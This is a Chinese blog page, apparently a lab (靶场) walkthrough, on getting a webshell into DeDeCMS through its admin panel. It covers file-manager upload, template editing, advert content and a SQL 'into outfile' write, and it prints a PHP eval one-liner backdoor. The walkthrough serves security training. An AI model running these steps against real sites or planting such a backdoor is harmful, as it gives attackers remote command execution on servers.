DeDeCMS靶场

devtools/2025/4/2 12:06:00/

通过⽂件管理器上传WebShel

步骤⼀:访问⽬标靶场其思路为 dedecms 后台可以直接上传任意⽂件,可以通过⽂件管理器上传
php⽂件获取webshell
# 后台
http: //【自己的IP】/dede
username: admin
password : admin
步骤⼆:登陆到后台点击 【核⼼】 --》 【⽂件式管理器】 --》 【⽂件上传】 将准备好的⼀句话代
码上传...OK
步骤三:访问上传成功后的⽂件

修改模板⽂件拿WebShell

步骤⼀:与WPCMS类似,直接修改模板拿WebShell..点击 【模板】 --》 【默认模板管理】 --》
index.htm 】 --> 【修改】 在⽂件修改中添加⼀句话代码
步骤⼆:点击 【⽣成】 --》 【更新主⻚ HTML 】 --》将主⻚位置修改为 【 ../index.php 】--》
点击 【⽣成静态】 --》点击 【更新主⻚】 再次访问站点⾸⻚可发现变化

后台任意命令执⾏拿WebShell

步骤⼀:点击 【模块】 --》 【⼴告管理】 --》 【增加⼀个新⼴告】 --》在 【⼴告内容】 处添
加⼀句话代码--》点击 【确定】
步骤⼆:点击【代码】--》在图中显示的路径与站点进⾏拼接....访问测试!
步骤三:使⽤菜⼑连接测试...

通过后台sql命令执⾏拿webshell

1.访问系统---sql命令⾏⼯具---执⾏ select @@ basedir,获取mysql路径,由此瑞测⽹站绝对路径
2.into outfile写⼊⼀句话⽊⻢
select '<?php @eval($_POST[cmd]);?>' into outfile 'D:/phpstudy_pro/WWW/webshell.php
3.访问webshell.php 并测试执⾏系统命令

http://www.ppmy.cn/devtools/170927.html

相关文章

前端自动化是啥

好的&#xff0c;我现在需要回答用户的问题&#xff1a;“前端自动化是啥”。根据提供的搜索结果&#xff0c;我需要综合这些信息来生成一个准确且引用正确的答案。 首先&#xff0c;我需要理解前端自动化的定义。根据搜索结果中的网页[1]&#xff0c;前端自动化是通过工具和脚…

Netty——BIO、NIO 与 Netty

文章目录 1. 介绍1.1 BIO1.1.1 概念1.1.2 工作原理1.1.3 优缺点 1.2 NIO1.2.1 概念1.2.2 工作原理1.2.3 优缺点 1.3 Netty1.3.1 概念1.3.2 工作原理1.3.3 优点 2. Netty 与 Java NIO 的区别2.1 抽象层次2.2 API 易用性2.3 性能优化2.4 功能扩展性2.5 线程模型2.6 适用场景 3. 总…

如何获取thinkphp的所有发行版本

是的&#xff0c;你只需要一行代码 composer show topthink/think --all 然后做了一个小实验&#xff0c;神奇的事情发生了。是我眼睛花了吗&#xff1f; 命令也能模糊查询了吗&#xff1f;tp6也太。。。。

描述@keyframes规则在 CSS 动画中的原理及作用,如何创建一个简单的动画

大白话描述keyframes规则在 CSS 动画中的原理及作用&#xff0c;如何创建一个简单的动画&#xff1f; 嘿&#xff0c;朋友&#xff01;咱来聊聊 CSS 里超酷的 keyframes 规则。这玩意儿就像是动画的剧本&#xff0c;能让网页元素动起来&#xff0c;就像给它们施了魔法一样&…

Linux:xxx is not in the sudoers file. This incident will be reported.

报错 xxx is not in the sudoers file. This incident will be reported.解决方式 切换到root用户下操作 # 1、修改/etc/sudoers文件为可修改&#xff0c;默认是只读的 ls -lh /etc/sudoers -r--r----- 1 root root 4.3K Dec 1 01:45 /etc/sudoerschmod uw /etc/sudoersls…

Leetcode 3495. Minimum Operations to Make Array Elements Zero

Leetcode 3495. Minimum Operations to Make Array Elements Zero 1. 解题思路2. 代码实现 题目链接&#xff1a;3495. Minimum Operations to Make Array Elements Zero 1. 解题思路 这一题的话核心就是统计对任意自然数 n n n&#xff0c;从 1 1 1到 n n n当中所有的数字对…

Harmony OS【获取本地json数据的方法】

// 文件名称 MapContent.json // 文件路径 resource/rawfile/MapContent.json [{"title": "准备与学习","brief": "加入HarmonyOS生态&#xff0c;注册成为开发者&#xff0c;通过HarmonyOS课程了解基本概念和基础知识&#xff0c;轻松开启…

Android获取U盘路径

1. 权限 <uses-permission android:name"android.permission.USB_PERMISSION" /> 2. 通过storemanager获取usb 路径 val storageManager getSystemService(STORAGE_SERVICE) as StorageManagerval volumes storageManager.storageVolumesfor (volume in vo…